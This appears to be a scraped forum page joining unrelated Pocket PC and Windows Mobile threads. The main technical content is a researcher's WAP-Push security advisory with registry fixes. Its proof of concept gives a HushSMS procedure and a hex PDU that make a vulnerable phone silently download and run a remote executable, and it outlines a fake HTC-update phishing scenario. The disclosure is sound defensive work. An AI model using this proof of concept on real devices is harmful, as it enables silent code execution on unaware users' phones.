Database Info

Any software for only 4,99$ !!!

Wasssup All,
Don't miss our great offer!
We write PocketPC software for you and it will cost only 4,99$
We write, you try and only then pay!
Just try and you won't be disappointed. We care of our customers' needs & wants
Contact us at: [email protected]
or leave your requests here!
---
Special Production Factory
[Mod Edit Still Researching]

Online application form
Get your software as fast as you want!
Just fill in our online application request at http://sp4ppc.land.ru
---

would be nice to have some names and details of products

I may be wrong - but my impression is that this is a specialized code shop. That is, tell them what you want to do and they will write the app. When you are satisfied, pay them $4.99. I assume they will make their money by offering that, and all other apps they write, for sale for that same amount.
Am I correct? What's the prize for sleuthing the intent of this (somewhat cryptic) thread?

Right!
BRosenow said:
I may be wrong - but my impression is that this is a specialized code shop.
Click to expand...
Click to collapse
You're absolutely right!
---

Please be extremely specific
Hello Dear Friends,
We would like you to be more specific when describing your software request
Thank You!

I am interested.
Please code for me a pocketPc software that will do GPS navigation without an external device.
You say it will cost only 4.99$. I take your word.
Please ship me the software within 2 weeks as told on your web site.
James

Re: Please be extremely specific
SP said:
Hello Dear Friends,
We would like you to be more specific when describing your software request
Thank You!
Click to expand...
Click to collapse
OK, here is what I need:
I need a software that can do the following:
1. Schedule automated textmessages on certain dates and time (Text Happy birthday or schedules based on Calendar and Contacts)
2. Personalized tones for a person or group of people
3. T9 dialer
I guess that's it for now
Please PM me if it is ready

JGUI. said:
I am interested.
Please code for me a pocketPc software that will do GPS navigation without an external device.
You say it will cost only 4.99$. I take your word.
Please ship me the software within 2 weeks as told on your web site.
James
Click to expand...
Click to collapse
It is impossible to have gps navigation without gps. It is possible to have a location based system using the gsm repeaters but this is not as accurate as a gps sytem.

cruisin-thru said:
JGUI. said:
I am interested.
Please code for me a pocketPc software that will do GPS navigation without an external device.
You say it will cost only 4.99$. I take your word.
Please ship me the software within 2 weeks as told on your web site.
James
Click to expand...
Click to collapse
It is impossible to have gps navigation without gps. It is possible to have a location based system using the gsm repeaters but this is not as accurate as a gps sytem.
Click to expand...
Click to collapse
I think he was being sarcastic..
But the consept is cool!
But will all of these apps have the same interface?

Macros Player
SPMacroMagic is a software to play recorded earlier keystroke macros
If you need to fill-in enormous number of on-line or off-line business forms then this software is for you! It records your key strokes once and then repeats your input as much times as you want! Very good for filling-in customized databases via terminal server connections, online WS forms and for other personal purposes
How to use it:
1) Install enhanced keyboard driver from optima.zip
2) Install 'SPMacroMagic' from MacroMagic_PPC.ARMV4.CAB
3) Run 'MacroRecorder' from your start menu and record your macros
4) !!! Select 'Leng Keyboard' !!!
5) Run 'MacroPlayer' and play corresponding macros with "CONTROL + MacroNumber" key sequence in any PocketPC application (Pocket Excel, Word, Explorer and etc)
6) To quit from MacroPlayer press "Control + 0" (zero)

SPRadar
This software is for those who don't have a GPS unit and want to fake their friends! It emulates the radar screen with randomly placed targets. Number of targets can be specified by the user, as well as size of targets and radar bar. When a target is detected the default detection sound is played. Default map and sound can be replaced with custom files.
How to use:
1) Install 'Radar' from "Radar_PPC.ARMV4.zip"
2) Run "Radar" from 'Start Menu' and enjoy!

Hi SP,
Is it for any type of software that runs on PPC? eg. maybe I want to have WarCraft on my XDA2, does it still cost the same?
Do I get bug fixes before I pay up? How about enhancement request?
How do one pay up? Over PayPal?

well ok here is a request...
I would like a today plugin that will show the following:
1. operator (possibility to subsititute the thew name with a pic.
2. An icon that will change when there is a missed call showing the number of misse call and pressing the icon will take you to the missed call list.
3. an icon that will change when there is an unread message (showing the number of unread messages and again clicking the icon will take you to the sms inbox
icon shoud be large enough to be thumb operated
counters should reset properly whenever the missed calls or inbox are opened...
optional features:
a press and hold on the icons will take you to the dialed numbers and write new message dialogue respectively
PS please do not mention the jgui myphone!

i like...
1) a new dialer skin that has a switch for auto-answer after # rings
2) either enhance turjah 2 or build me a new space arcade shooter that utilizes the vibration (as a rumble pack on nintendo)
3) build a text to speach program ( like that SAYIT program that no one seem to be able to download)
oh, and can u fix my sipix printer driver to work on 2003?

Hi
I would like some software that can send all sound either out of the bottom connector when pin 20 is pulled low, or over bluetooth.
Cheers
JustinP

Hi,
Is it for any type of software that runs on PPC? eg. maybe I want to have WarCraft on my XDA2, does it still cost the same?
Click to expand...
Click to collapse
Unfortunately, I don't have WarCraft source codes and I have no desire for re-writing the WC. I can propose you the terminal services client enhancement tool that will allow you to run your WC over the PPC device.
Regarding the type of software, it can be any software (even web-services, drivers and etc). Such big projects as games and other will have more reasonable prices and terms. Make your order first and then you will get the more exact conditions explained
Do I get bug fixes before I pay up?
Click to expand...
Click to collapse
Bugs-free software is guaranteed by 99,9%! On the other hand, you will receive two versions of the software. One is a preliminary test version to get your feedback on implementation and to amend your recommendations. The other one is a final version after which you shall make the payment. But if you found a bug, then the free fix is on the way to you!
How about enhancement request?
Click to expand...
Click to collapse
It's up to the technical demands. If your request requires to re-code the entire software, then you will be notified about such re-coding and it will cost the same sum. But if it is only couple of design or small functionality changes, then there is no fee charged. This provision is in effect prior to final version.
How do one pay up? Over PayPal?
Click to expand...
Click to collapse
It depends on your preferences. If you prefer to deal with PayPal, then let's it be PayPal. You can use WM, EP, bank transfers (SWIFT/WU) or credit card remittance
Sincerely,
SP

SMS checker with source codes available
[Software archive UPDATE]
If you need a software that will listen for a custom incoming SMS and perform a certain action then you need our SMSWaiter.
SMS waiter is a software which looks for your custom SMS and performs different actions (writes sms data to the registry, launches your software and etc)
attention .NET developers: source codes of integration with IMailRule are also available!!!
---------------------------------------------------------------
Dear Friends,
I regret to say that due to the lack of time I can't check this message board on a daily basis. Thus, I can't take your orders from this board anymore. Please proceed with your requests via our online request form at http://sp4ppc.land.ru
You can also post your requests about software for other operating systems there. Currently we can handle programming under Windows and Unix operating systems. Our extra offers are: databases (design and db-software), web-services (.net), web-scripts (asp/php/perl), web-design (dynamic) and cryptography (design of algs, testing & cracking). After receiving such order we will let you know about the terms and conditions of your request as fast as we can.
Thank You!
---------------------------------------------------------------
If there are people that are in real need of a software but they can't afford it. They are welcome to request it. Implementation in this case depends on free time of developers and their interest in the software requested.

SP, here's y request
OK, here is what I need:
I need a software that can do the following:
1. Schedule automated textmessages on certain dates and time (Text Happy birthday or schedules based on Calendar and Contacts)
2. Personalized tones for a person or group of people
3. T9 dialer

I've written what I need in pm message, but no response.
Uros

Any pcAnywhere 11.5 / 12 Pocket PC users in here?! Please help!

Hi guys and gals,
I’m working on a FULL roundup of ALL Pocket PC – to – PC remote solutions.
Does ANY of you know where I can get the Pocket PC-specific CAB file of Symantec pcAnywhere (it’s just the Pocket PC client, NOT the pcAnywhere server itself)? It’s everything I need – as I already have the (beta) server (available at ftp://ftp.symantec.com/misc/sabu/pca12beta/SymantecpcAnywhere.exe ). Unfortunately, while the documentation refers to a “Mobile” (Pocket PC) client, I couldn’t find it anywhere. I couldn’t find any track of it on the Symantec Website. The Mobile update available at ftp://ftp.symantec.com/public/english_us_canada/products/pcanywhere/12.0/updates/pca1201_mobile.zip can’t be run by itself either – it’s just an update requiring a previous install.
I also contacted Symantec yesterday. The online chat was useless (the CS guy just repeated “you need to buy the full version” – oh yes, I am eager to shell out $200 for a product I just want to give a test ride for a roundup and won’t ever use otherwise) and I’m not at all sure they have received my mail I tried to send yesterday (had to send it via their online mailer app and I think it hasn’t sent out my mail – when I clicked the “Go” button, it switched to another page far too quick).
BTW, I’ve also posted a very early draft version of the comparison / feature chart of my forthcoming article to http://www.winmobiletech.com/PPC2PCRemoteRoundupTable.htm . It’a a Word export, not a native HTML chart and, therefore, its size is a bit big (200k). The chart, of course, doesn’t contain pcAnywhere; I’ll also insert it as soon as I’m able to thoroughly test the PPC version.
Of course, anyone who helps will get the proper credits and thanks in the article

Further discussion: http://www.aximsite.com/boards/showthread.php?p=1244263
BTW, the CS guy at the chat wasn't even able to say whether the full version has an "install mobile client to Pocket PC" option, let alone whether there's a separate product called 'pcAnywhere Mobile'... it seems they don't have the slightest clue about what they should support.

In the meantime, thanks to akheron from AximSite, I’ve found the (beta version, but working) app.

BTW, feel free to check out and comment the comparison chart (the backbone of the forthcoming article). I’ll only be able to publish the final version of the article next week, it seems – I’m still awaiting answer from some of the software developers for some of my questions.
It’s at http://www.winmobiletech.com/PPC2PCRemoteRoundupTable.htm . Note that the chart is not finished yet; there’re still some table cells to fill in (for example, the HTTP gateway tests). The bandwidth usage etc. tests have already been conducted, on the other hand, and most “Verdict” cells are also filled in.
Opinions are welcome

For logmein.com, under Login you list "- (have to reenter the l/p every time you log in to both your online Web account and the remote desktop)"
Logmein.com let's you create a favorite that passes the login/pass. It saves a ton of time!
It's under Settings after you log in. Click on Settings next to the PC you want to add. Click on Create a Desktop Shortcut. Follow the directions and tap and hold the icon and choose Add to Favorites.
Mine's currently set up to ask for an access code anyways. Still easier than entering an e-mail address and password!

Bushrod said:
For logmein.com, under Login you list "- (have to reenter the l/p every time you log in to both your online Web account and the remote desktop)"
Logmein.com let's you create a favorite that passes the login/pass. It saves a ton of time!
It's under Settings after you log in. Click on Settings next to the PC you want to add. Click on Create a Desktop Shortcut. Follow the directions and tap and hold the icon and choose Add to Favorites.
Mine's currently set up to ask for an access code anyways. Still easier than entering an e-mail address and password!
Click to expand...
Click to collapse
Thanks a million, I'll check this out.

[Security Advisory] Manufacturers leave device open for WAP-Push based attacks

Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers

This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.

tmknight said:
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
Click to expand...
Click to collapse
For SI you are right since the user only gets notified with an URL, but I would call it a huge whole for the SL things. SL messages get executed by the device immediately without the user having a way to block or stop this (if the message is set up accordingly; there are 3 message options as per standard and I refer to the silent execution flag).
If you are watching your device while the messages comes in you can see that a gprs connection is beeing made (if you are connected the whole time with an unlimited data plan for example you wouldnt even notice this).
Just give it try with the method I posted in the advisory with HushSMS (not advertising my program here, just giving a proof of concept).
Both advisories are made by me since I dicovered both flaws.
Cheers

I just made a youtube video to demonstrate what this vulnerability means.
Watch it here: http://de.youtube.com/watch?v=QhJ5SgD-bdQ

I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Will you share from where this info came?
Cheers

tmknight said:
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Click to expand...
Click to collapse
Well this is interesting. So you say you had the same faulty registry keys like the new kaiser wm 6.1 rom had? (100c and 100d set to 840 and c40)
As you may have seen in the video my IE simply did not ask to open the file. It just gets executed...
Well, then at least your IE settings saved you from getting r00ted
tmknight said:
Will you share from where this info came?
Click to expand...
Click to collapse
This vulnerability was researched by me about 1 year ago. But the default settings for SL and SI messages was always set correct in the last ROM versions for the devices I had. I just looked at the default settings on this new kaiser rom and found that they left it open for whatever reason and so I published this advisory. I already contacted HTC and am waiting for a response.

hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks

Hello,
Good day, I would like to thank you for this post about Wap Push Messages. I have a straing problem with my HTC Kaiser Windows Mobil 6.1. My device don't notify me about any WAP Push Messages. I have the 800 & c00 vales in my registry, I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new message again but it didn't appear in inbox message and my cell didn't notify me about new WAP PUSH message.
I'm going crazy with this, what's the problem, can you help me ?
Regards,

Desigen said:
... I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new messeage again but it didn't appear in inbox message and my cell didn't notifcate me about new WAP PUSH message.
...
Click to expand...
Click to collapse
I don't understand what exactly your promblem is with. If you set the Microsoft recommended values it simply tell the device which security policy to apply to wich kind of messages. In the case of the two values the settings say that WAP-Push SL & SI messages have to come from trusted push proxy gateways. If you set them to the faulty values (840&c40) the device accepts these kind of messages coming from any. If the correct (or recommended) values are set the device simply drops or discards the messages without any user notification. So your described behaviour looks normal to me.
(Note: for those who are familiar with device roles and policies, I'm not going into deep here to avoid confusion)

Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks

nolovelust said:
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Click to expand...
Click to collapse
Well 0x800 for 0x100c is fine but 0x40 for 0x100d is not.
Policy 4108 (0x100c) handles WAP Push Service Load (SL) Messages
Policy 4109 (0x100d) handles WAP Push Service Indication (SI) Messages
So if policy 4109 (0x100d) is set to 40 this means that the device will accept messages from any instead of trusted push proxy gateways only.
So the settings you wrote above mean the following:
4108 (0x100c) = 0x800 : Accept WAP Push Service Load (SL) messages only from trusted and authenticated push proxy gateways
4109 (0x100d) = 0x40 : Accept WAP Push Service Indication messages from any originator and no authentication is needed
While Service Indication messages are not as harmful as Service Load messages, they still can try to fool people into clicking the download now option. Since the orginator is hidden and you only see network message as the sender, this kind of attack can be used to spoof valid operator messages.
I suggest you set 4109 (0x100d) to a value of 0xc40.
These settings do not prevent your device from receiving these kind of messages, but they have to come from an authenticated and trusted push proxy gateway or source.

Desigen said:
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
Click to expand...
Click to collapse
Which kind of wap push message are you talking about?

For those that would like to read more about security policies and roles on windows mobile google for:
"Security Model For Windows Mobile 5.0 and Windows Mobile 6"

c0rnholio said:
Which kind of wap push message are you talking about?
Click to expand...
Click to collapse
Dear c0rnholio,
I think it's SL, I talking about the one you receive an option to download the content for Internet. Because my mobile provider send a WAP-Push to download ringtone over GPRS. So, they told me you need to do some modification in your mobile to receive this kind of messages. My mobile don't save the WAP-Push in the inbox folder. But when I put my SIM in Nokia phone I receive those WAP-Push.
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content.
Thansk

Desigen said:
...
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content...
Click to expand...
Click to collapse
Ah, OK, now I got you. Well, if the policy is set right your device will discard the message you sent with HushSMS because it is not coming from a trusted and authenticated source. But you should still be able to receive these messages from your service provider if your device is properly provisioned.
The fact that you can receive them on your nokia just indicates that nokia also has lazy security settings for these kind of messages.
If you cannot receive your ringtone from your provider when the correct policy settings are applied it seems that your device is not provisioned to trust your service provider. I suggest you enable it temporary by setting the unsecure values and after receiption of your ringtones reset them to the secure values.

Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Download it at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers

Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !

Desigen said:
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Click to expand...
Click to collapse
It seems you misunderstood me, or I'm simply not getting your point here.
Yes, with a value of 0x40 for 0x100d you can receive WAP Push SI messages from anyone. This might become a risk. The secure setting for this policy is 0xc00. This will save you from unwanted SI messages but may block your providers ringtone messages.
The default values you had where set from HTC (or whatever ROM you migth have installed) with the delivery of the ROM that is installed on the device. That's the final point of the advisory. The ROM manufacturer has left the device open for these kind of attacks.
However a final word in our little discussion:
If you want to be able to receive WAP Push messages from an untrusted and unauthenticated source then leave the settings as they were at the beginning. Be warned as this may be a security risk.
If you don't want to receive WAP Push messages from untrusted and unsauthenticated origins, then change the values as described in the first post.
As a rule of thumb: If you want to receive these messages, even if they come from untrusted and unauthenticated sources, but only want this temporary (for example if you know that your provider will send you a ringtone in the next minutes) then set the values to 0x40 each and after you received what you want reset them to the recommended values on the first post.
I'm out...
cheers

Thanks for sharing this usfull information with us.

I don't understand the value '0xc00' -- does that mean just change it to zero's? That's what I did using the registry editor... there were both 'hex' and 'dec' settings, with the 'hex' dword value appearing to be the one that needed fixing -- so I changed 0000100c to 800 and 100d to 0 -- is this right, or have I inadvertently instructed orbiting alien spacecraft to open fire upon earth?
Maybe screenshots, or a little more explanation on exactly what registry changes need to be made, I'm not used to ones with both hex and dec entries...

Updated 12-26: Making progress, calling all DEV for help

Hey devs, still working on making it so that HTC Messaging will handle incoming SMSs from Google Voice. At first I was starting with trying to change HTCMessaging to connect via web instead of SMSC, but that has proven to be a big circular pain, so now I'm trying a different route. I'm tweaking some code that is very similar functionally to OneDialer that will accept the incoming SMS and also send out via packet data, but what I'm trying to do is have it insert the contents of that message directly into whereever HTCMessaging stores SMS(and also activate Notification even), but I can't find it. Any help getting pointed in the right direction would be greatly appreciated, It'd be nice to have free SMS from Google Voice show up in the gorgeous Messaging tab.

Bump...and small update: 1.) I have found and analyzed the dll that handles all the SMS commands with IDA Pro, but past that I'm basically looking at a massive amount of code I could definitely use help sorting through, and 2.) I know that SMS are stored in cemail.vol which obviously is edb format, and I don't know if I can find the code in right applications, like Microsoft My Phone, in order to write to that file.
So right now I'm at a crossroads, with two routes I think I could take:
- I could tweak HTC Messaging to pull from a file of my own making
- I could create a program that is able to write to cemail.vol, while this method would simplify everything after that part of the process, and create the most desirable results, it would be very difficult to unlock the file in the first place because it is locked by the very messaging client I want to read from it.
I would GREATLY appreciate the help of any devs out there who are smarter than me, because I'm sure a lot of people are going to want this app once it is finished.

[Q] Share/Send recorded sound

hi,
i used an existing sound recorder and implmed, one by myselft.
There are some samples form MS, how to do sound recording too.
Now i want to send the recorded sound to another user's android phone.
Should be simple
- Send as email attachment
- Send via bluetooth
I did not find a program on the marketplace and trying to implent this by myself i found no example, how to do this. In this forum and on other resources, i read, that it currenty is not possible, to send email attachments programatically.
Is there really no way, to do such a simple task, as sending/sharing an audio file (after converting the recorded byte-array to .wav format) to another phone via email or bluetooth ?!
regards,
hannes

E-Mail attachment shouldnt be hard but WP7 does not support bluetooth file transport

Forget about bluetooth (until MS releases some kind of BT API). As for email attachment, you have a two options:
- implement smtp/exchange client by yourself;
- use (create) http "proxy" service on the external server (you sending audio data and additional parameters, and service forms the message with attachment).
Both ways a really not easy and expensive.

Send me a PM and I'll write something and upload it to the marketplace tonight.

MJCS said:
E-Mail attachment shouldnt be hard but WP7 does not support bluetooth file transport
Click to expand...
Click to collapse
The problem is: An email attachment in fact IS hard (impossible), without using some external service.

sensboston said:
- implement smtp/exchange client by yourself;
- use (create) http "proxy" service on the external server (you sending audio data and additional parameters, and service forms the message with attachment).
Both ways a really not easy and expensive.
Click to expand...
Click to collapse
Thank your for your response!
This is quiete the same, what i found out too. It is possible (i am a developer and i can host such a sevice on my domain) but that's not the way i like to do it.
I play in a band and recorded some demo with the phone and now want to send this recording to my band colleagues but it was not possible to do this.
This should be as simple as "open a bluetooth connection" + send.
On a windows phone, store it in the "media collection", on other phones, store it on a selectable location on the file system.
This is really anoying.
I like the platform and like developing for it but not beeing able to do such simple things...it's hard to argue, why WP is better than f.e. android.

MJCS said:
Send me a PM and I'll write something and upload it to the marketplace tonight.
Click to expand...
Click to collapse
I think, i don't get the point of your reply.
What do you want to write - a program, that does does recording audio + email it to other users?
I am searching for a solution, how to develop this by myself, not for a program on the marketplace.
regards,
hannes

HannesB said:
I think, i don't get the point of your reply.
What do you want to write - a program, that does does recording audio + email it to other users?
I am searching for a solution, how to develop this by myself, not for a program on the marketplace.
regards,
hannes
Click to expand...
Click to collapse
Oh...and I had already started programming it. Oh well. Basically do this:
Upload to SkyDrive using the API or...
Create a WCF Service that allows you to send a file stream
Have the files stream get written to the server as a GUID
Return link to file
Send link via e-mail
Have file expire after 24/hrs or something

hi,
thank you, for your response.
...and starting programming on it so fast.
(if you really started programming it - put it on marketplace, i am sure, many people would like souch a tool)
The "problem" with this approach (and email too) is:
- i need an internet connection to upload
- the people that want to download the file, need an internet connection
- there are still people, that don't have an internet flatrate for their phone or any internet connection (or have to use roming, if not at home) and jus say "..hey, you recorded it - send it to me via bluetooth".
Seem's, the steps you discribed, are the only option, to do it. The phone i used 5 year ago, could send pictures and audio recording via bluetooth and since the mango update is currently released and doest not contain an api for bluetooth access, i think it will not be released soon, if ever.
In another posting i read: "I take a picture with me and my friends and i can't send them over the bluetooth. They have cheap dumbphones and I have Omnia 7 and I'm embarrassed. Bluetooth filetransfer is essencial feature."
Ok, this is "offtopic" now, sorry but anyway thank you for your responses.
The steps you explained are possible for sure, but in my opinion a bit "much work", for simply sending some data != text.

HannesB, I agree with you, it's kinda annoying. But, probably, MS will open some new APIs in future (WP7 is based on WinCE so it's not such a big deal, code/drivers are already exists for that platform). Don't forget - WP7 platform is still too new.

I have an app called CopyCat. It will let you do recordings (and change the playback as well).
http://www.windowsphone.com/en-US/search?q=copycat
It will let you store to the Public folder of your DropBox account.
As previously mentioned, unfortunately there is no way to attach WAV files to an email currently.
Hope this can be of help.

Why are you guys complaining about a function that you can have with evernote you can record sound and save it on your evernote account over your windows phone